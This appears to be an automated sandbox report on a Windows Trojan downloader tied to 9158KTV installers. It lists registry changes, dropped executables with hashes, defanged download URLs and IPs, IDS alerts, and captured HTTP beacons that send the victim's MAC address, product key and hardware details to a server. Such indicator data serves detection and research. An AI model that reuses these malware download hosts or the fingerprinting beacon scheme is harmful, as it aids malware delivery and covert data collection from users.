"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

The process regsvr32.exe:1124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 47 31 82 39 D8 42 05 2E CC 33 5C 83 E4 5B 5E"

The process regsvr32.exe:2940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 39 52 96 CA 39 CA 61 B4 82 1A AA 2E 61 00 CF"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"

[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"

[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

The process 9158.exe:2088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"

[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"

[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"

[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"

[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"

[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"

[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 30 4F 3C 5C 6B D3 D9 BF 8C B0 B5 F6 48 2F B4"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"

[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"

[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Control]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\Programmable]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Programmable]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Insertable]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\Programmable]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]

Dropped PE files

MD5 File path
23b3afde34b252b53e7c1b4a78cb9712 c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027
ef8154cf33a6ac0dffc02f325acfb7de c:\Documents and Settings\"%CurrentUserName%"\Application Data\dts\mydts\dts.exe
91aeea640a17ed03dcfcde1b9096a86f c:\Documents and Settings\"%CurrentUserName%"\Application Data\dts\mydts\uninst.exe
50fdadda3e993688401f6f1108fabdb4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\Inetc.dll
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\System.dll
05450face243b3a7472407b999b03a72 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\nsProcess.dll
7b21f6e266e8a4188871804c9810d74a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe
d7a6bde253e3b614afc203d9ff406855 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe
23b3afde34b252b53e7c1b4a78cb9712 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe
7b21f6e266e8a4188871804c9810d74a c:\Program Files\MM-liao8398.exe
d7a6bde253e3b614afc203d9ff406855 c:\Program Files\yx_dts.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 525730 528384 5.16694 9669be3168afdeaa40ea92d045a9bf87
.rdata 532480 78292 81920 3.10013 59a4df56cb6817d94f6644cd1766027b
.data 614400 137384 73728 4.23409 638d29c6b937c71b888b0b82efddfb46
.rsrc 753664 22336 24576 3.3136 c674065dbbb8d9d754a7080269a63dd4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.ancheke.cn/ffdy_238_63518.exe
hxxp://na.b9.aicdn.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
hxxp://t.cn/RzuoiTP 180.149.135.224
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php 180.149.136.250
hxxp://show.man1234.com/mmliao/MM-liao8398.exe 122.227.42.227
hxxp://idc.lssen.net/yx_dts.exe
hxxp://opt.xdwscache.glb0.lxdns.com/Opendownloadernewxml.aspx?softlist=&lmarkid=83
hxxp://opt.xdwscache.glb0.lxdns.com/temp/downloaderico/main.ico
hxxp://idc.lssen.net/OfficeAssist.0419.80.1123.exe
hxxp://opt.xdwscache.glb0.lxdns.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9
hxxp://newgameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1
hxxp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=237&ext_1=2&ext_2=feitian_wd&ext_3=905848&ext_4=855392B634F846E395634D027DCD1AB4&ext_5=1c4e8afc5f13c9a8784201dba5a3f2e0&ext_6=2&browser_type=3001 113.107.101.168
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1.css?t=1419052484
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1/main.jpg
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1/log.jpg
hxxp://c02.i05.arnic.hadns.net/yx/dts/sqft/905848/app.ini
hxxp://opt.xdwscache.glb0.lxdns.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9
hxxp://opt.xdwscache.glb0.lxdns.com/Downloaderconfig.aspx?imgtype=9158
hxxp://ui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
hxxp://1st.dl.glb0.lxdns.com/ktv/9158chat2_ktv083_98200205.exe
hxxp://tj.9158.com/temp/downloaderico/main.ico 203.130.60.32
hxxp://idc.xn--r93a55o.cc/yx_dts.exe 222.186.60.69
hxxp://img1.37wanimg.com/dts/css/client/game1/main.jpg 203.130.61.92
hxxp://www.hanyueyr.com/ffdy_238_63518.exe 42.121.253.211
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 203.130.60.32
hxxp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1 121.201.12.94
hxxp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 108.186.7.130
hxxp://idc.xn--r93a55o.cc/OfficeAssist.0419.80.1123.exe 222.186.60.69
hxxp://tj.9158.com/Opendownloadernewxml.aspx?softlist=&lmarkid=83 203.130.60.32
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 203.130.60.32
hxxp://d.wanyouxi7.com/yx/dts/sqft/905848/app.ini 61.156.157.181
hxxp://img1.37wanimg.com/dts/css/client/game1/log.jpg 203.130.61.92
hxxp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158 203.130.60.32
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 112.90.83.106
hxxp://img1.37wanimg.com/dts/css/client/game1.css?t=1419052484 203.130.61.92
down.cncpa.net 222.186.129.20
jh.01lm.com 171.107.186.80
pchome.b0.upaiyun.com 108.186.7.129


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET DNS DNS Query for Suspicious .com.cn Domain
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY NSISDL Iplookup.php IPCheck
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System

Traffic

GET /Opendownloadernewxml.aspx?softlist=&lmarkid=83 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:37 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>..<config>...<Ti
tle>..........9158ktv</Title>...<XieyiUrl>hXXp://tj.915
8.com/temp/provision/9158ktv.htm</XieyiUrl>...<AdvertUrl>h
ttp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>
...<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>...&l
t;ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>...<Icon>htt
p://tj.9158.com/temp/downloaderico/main.ico</Icon>...<IconTip
s>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>...
<Setuptime>20</Setuptime>...<ToolIcon>9158........&l
t;/ToolIcon>...<Item>9158ktv</Item>...<Mtype>19&l
t;/Mtype>...<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.h
tml</ErrorUrl>...<check>....<visible>1</visible&g
t;....<choice>1</choice>....<checkName>........</
checkName>....<downUrl></downUrl>...</check>...&l
t;check>....<visible>1</visible>....<choice>1<
/choice>....<checkName>........</checkName>....<down
Url></downUrl>...</check>..</config>......
<<< skipped >>>

GET /temp/downloaderico/main.ico HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:39 GMT
Cache-Control: No-cache
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:61cd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Via: 1.1 zjjhdx33:8106 (Cdn Cache Server V2.0), 1.1 td48:10 (Cdn Cache Server V2.0)
Connection: keep-alive
..N....................................n..qR..qL..._...q...~..........
.................h..V...W....p...............................w...j..oP
..oI...e...{..............................v?..h/..p:..................
.................z...d..aB..kD...b....................................
...w.......................................|...a..\>..qQ...N.......
......................................................................
..w..nF..`D..o\.%qE...F...i...q...o...o...p...t...v...w...v...w...z...
{...z...x...x...y...v...k...N..c=..mY.I....o\.0nG..m8..h/..i1..j1..r8.
.x=..w>..v=..q9..q;..yB..yB..xC..l:..k9..j9..r@..j=..hE..nY.L......
......................................................................
........................(... ...@..... ...............................
..o].Ixa...d..wW..pM..qM..qL..pK..yT...a...a...`..._...Y..oC..oC..oB..
pC...\...\...\...[...Z..uJ..i=..g?..iJ..o[.sUG..........p^.f.f...p...w
...v..}]..|Z..|X..|W..~X...t...t...r...q...l..zL..zL..zK...P...m...l..
.l...k...i..xH..rC..k>..c7..`8..lV..OB..m[.,~f...v...............}.
..g...f...e...c...|...............}...Y...X...V...d...|...|...{...{...
i...Q..{N..uI..mA..e9..lF..p].gu`...o.......................z...p.....
....... .h...F......... .........  .... .....6...00.... ..%......(....
... ..... .........................p^...g...j..vT..vR...`...j...e..uH.
.vH...d...c...U..k?..eA..lU.*.g...........}...j...q...........]...c...
........]..|P..qF..nL...d...............{...t...........m...u.......e.
..v...}......tK..z^...z...............}......D....h...p...d..xF...
<<< skipped >>>

GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU           E7340  @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:45 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1142
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body>..    <form
 name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=ie
xplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Window
s XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-
C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU 
          E7340  @ 2.40GHz&Graphics=VMware SVGA II&Safe=&
;QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1
419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&q
qnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V
1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__
VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==
" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIE
WSTATEGENERATOR" value="05019BFC" />..    <div style="text-align
:center">..    <img  title="webgo"..    </div>..    </f
orm>..</body>..</html>......
<<< skipped >>>

GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU           E7340  @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:51 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1142
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body>..    <form
 name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=ie
xplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Window
s XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-
C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU 
          E7340  @ 2.40GHz&Graphics=VMware SVGA II&Safe=&
;QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1
419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&q
qnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V
1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__
VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==
" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIE
WSTATEGENERATOR" value="05019BFC" />..    <div style="text-align
:center">..    <img  title="webgo"..    </div>..    </f
orm>..</body>..</html>....
<<< skipped >>>


GET /dts/css/client/game1/log.jpg HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Fri, 09 Jan 2015 03:31:26 GMT
Date: Wed, 10 Dec 2014 03:31:26 GMT
Server: nginx/1.0.11
Content-Type: image/jpeg
Content-Length: 50696
Last-Modified: Wed, 23 Apr 2014 06:14:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx41:8104 (Cdn Cache Server V2.0), 1.1 kf48:10 (Cdn Cache Server V2.0)
Connection: keep-alive
......JFIF.....H.H.....C..............................................
......................C...............................................
..........................t...........................................
..K...........................!.."1.2A.#BQa...q$3Rb...%&r...'5C..(47E.
....DG..................................W..........................!.1
."2AQ..BRaq..#.....$3b....CSTV..%r....4c.....&5Det..................?.
...4{=n.w%.`..h.....,.]e...szie.R=X..I.......F.D.MO.1C.O.;.-........:y
..rjR...t@...nc..u..r$FM..2.zD_).V......v........j".a.W.D..W...}..K.n.
.[5.]T.H....9..?..z.b..V.=4......h..p..!......8......MO..&T.".F.m^...T
..L..D..}^..H.3../.(*......#y.....<f......y(.q.=..T*.v.. ."......a.
y!...R.8M........:..`... .O..H.O..[......H.".O,.@.IfI&\.S...\a.!S..^-.
.)Zm....*E.{.a2../Sn.eP.^.8CJ..[.~......@<..&.yi.....Nx....@.9W<
T.G..I.&W.=....rr.E7....i.........vM.....2H.....^.}Ys..=....3n_...8.'.
.$...M......]~.Drj";.b.........}....9.............U.K.p....N.....-1..S
.......:.E|.>Y.1.ME:2.,.V.Q?........Kx"]F.y]....O....g..5>K.8...
....NF..T....pn...........Vx..mE..D.05C..l(..?..8..D..f...9/rU...pT...
....<H.O........x.Ec.=..:..h.......Sn..... O.,..%4V.u.}.....h.~....
